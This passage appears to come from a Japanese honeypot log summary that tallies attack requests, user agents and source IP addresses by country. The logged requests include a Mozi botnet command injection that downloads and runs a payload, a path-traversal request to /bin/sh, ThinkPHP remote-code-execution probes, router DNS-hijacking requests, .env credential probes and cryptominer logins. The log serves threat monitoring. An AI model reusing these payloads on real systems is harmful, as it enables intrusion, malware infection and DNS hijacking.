1	`Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Roku/DVP-9.10 (289.10E04111A)`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`MGLNDD_132.145.66.34_80\n`
4		`\x03`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01\x02`
1		`\x16\x03\x01`
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4334zn3ya14JmyVvkbE2H71R3aqBK1h7VVdFk9hFVmq1FQVq8DjJSQsGvPYMqiG2vSbd1jy2P28FL1wxXePt84Wi96wJ69d\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x961df681fb3595aaeacfb5c1c39c3e59a24333b8\",\"x\"],\"jsonrpc\":\"2.0\"}\n`
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n
1	CONNECT	`google[.]com:443`	HTTP/1.1
12	GET	`/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/SiteLoader`	HTTP/1.1
1	GET	`/WuEL`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/a`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=128.0.104.18&fdns_dynamic2=128.0.104.33&fdns_dynamic3=128.0.104.18&fdns_dynamic4=128.0.104.18&sdns_dynamic1=128.0.104.18&sdns_dynamic2=128.0.104.33&sdns_dynamic3=128.0.104.18&sdns_dynamic4=128.0.104.33&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=150`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.33&dnsDynamic=0&dnsRefresh=1`	HTTP/1.1
1	GET	`/download/file.ext`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/home`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/mPlayer`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z72612114222Q1`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.18&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	8.209.118.112	Singapore
1	20.25.190.81	United States
1	44.234.125.120	United States
2	45.227.254.49	Belize
11	54.37.79.75	France
1	61.53.84.226	China
1	66.240.192.82	United States
1	66.240.205.34	United States
4	71.6.158.166	United States
1	80.66.66.27	Russia
1	92.255.85.183	Hong Kong
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	147.182.200.213	United States
8	152.89.196.62	Russia
1	159.203.126.102	United States
1	159.203.183.146	United States
2	162.142.125.219	United States
2	162.142.125.220	United States
7	167.71.99.241	United States
2	167.94.138.61	United States
1	172.104.242.173	United States
1	172.105.77.209	United States
1	182.126.239.134	China
1	184.105.247.244	United States
8	185.254.196.223	Ukraine
1	192.241.195.65	United States
1	192.241.205.227	United States
1	192.241.212.88	United States
2	194.26.228.174	Russia
2	194.165.16.76	Panama
1	198.235.24.143	United States
1	205.185.116.25	United States
1	208.67.105.124	United States
1	209.141.49.169	United States

UserAgent一覧

件数	UserAgent
24	`-`
1	`AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9`
4	`Go-http-client/1.1`
1	`Hello, World`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_13.67.44.234_80`
6		`\x03`
3		`\x16\x03\x01\x01D\x01`
3		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
24	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=128.0.104.18&fdns_dynamic2=128.0.104.33&fdns_dynamic3=128.0.104.18&fdns_dynamic4=128.0.104.18&sdns_dynamic1=128.0.104.18&sdns_dynamic2=128.0.104.33&sdns_dynamic3=128.0.104.18&sdns_dynamic4=128.0.104.33&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=150`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/home`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.18&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=`	HTTP/1.1
3	PRI	`*`	HTTP/2.0